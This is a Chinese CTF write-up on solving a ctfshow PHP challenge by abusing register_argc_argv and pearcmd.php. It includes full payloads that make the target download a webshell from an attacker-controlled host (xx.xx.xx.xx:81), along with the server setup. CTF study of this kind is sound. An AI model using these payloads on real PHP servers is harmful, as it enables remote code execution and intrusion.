在之前ctfshow平台的萌新22,大家都认为是无解的,题目也介绍了"还能搞,阿呆表示将直播倒立放水"。但是在级客巅峰结束的那天晚上,群里的师傅介绍说,如果修改了php.ini里面的配置(register_argc_argv)可以做出来。最后是真的做出来了。 使用阿呆~~~?
下面是自己的思考,感谢Guoke师傅和ha1c9on师傅的帮助
通过可变信息通过GET方法是类似于参数传递给可执行文件。许多语言处理等方面argc和argv参数。 argc是参数计数,并,argv是索引数组,包含的参数。如果您想声明变量$argc和$argv和模仿这种功能,使register_argc_argv。 $argc变量是⽤于记录数组的⼤⼩ $argv变量是⽤于记录输⼊的参数。 这里借p神的介绍 经过简单测试,发现⽼版本(测试版本为5.2.17)默认为 On,新版本(测试版本为 5.4.45、5.5.9、 7.3.4)默认为 Off 奇淫技巧 这个是自己看p神的知识星球知道的。 我们是可以通过$_GET或者$_POST的⽅式来操控 $_SERVER['argv']的值的,但是如果测试可以发现,如果直接传⼊值,⽆论多少个参数,$argc的 个数始终是 1
#测试代码 <?php error_reporting(0); $a=$_SERVER['argv']; var_dump($a); ?>而我们可以通过+来进行分隔符。 (这里不解释,需要知道的可以去p神的知识星球了解)
拓展:这个小trick,自己前几天出个一个题,如果有兴趣的可以去ctfshow平台的web入门126去试一试。
如何熟悉PEAR的使用? 在linux下面安装直接输入命令apt install php-pear
参考链接 这个题只需要利用文章里面的第一个方法: 下载一个档案文件(php文件)并使用lfi 而这个下载的命令是pearcmd.php里面有的 在pearcmd.php目录下面输入php pearcmd.php -help
而正好,这个题开启了register_argc_argv可以通过+来分隔命令,先进行包含pearcmd.php然后在通过+分隔符来执行download命令
这个方法是Guoke师傅告诉我的,可以在我们的vps上面创建一个eval.php里面内容是
<?php echo "<?php system(whoami);?>"; ?>然后在题目上传值 ?c=pearcmd&+download+http:/xx.xx.xx.xx/eval.php 最后访问eval.php就执行成功
是ha1c9on师傅告诉我的,可以在~目录下创建一个shell.php 内容就是一句话木马. 然后通过python3开一个http服务 python3 -m http.server 81 访问的时候就是~目录下面的文件 当我们控制目标服务器去访问eval.php的时候会自动下载到目标的服务器上面
payload:?c=pearcmd&+download+http://xx.xx.xx.xx:81/shell.php
然后访问并执行命令 获得flag
方法一: 实现的原因是下载的过程会执行php代码。这里自己测试了一下如果,利用方法一,文件内容是 <?php system(whoami)?>,然后访问这个文件会输出www-data。但是文件内容也是www-data。所以就验证了我的解释。 方法二: 实现的原因是我们通过python3开一个服务,而php文件的路径不在网站根目录下面就不会当php解析就会自动下载。
如果,文章也不足的地方希望师傅们指出。共同进步。
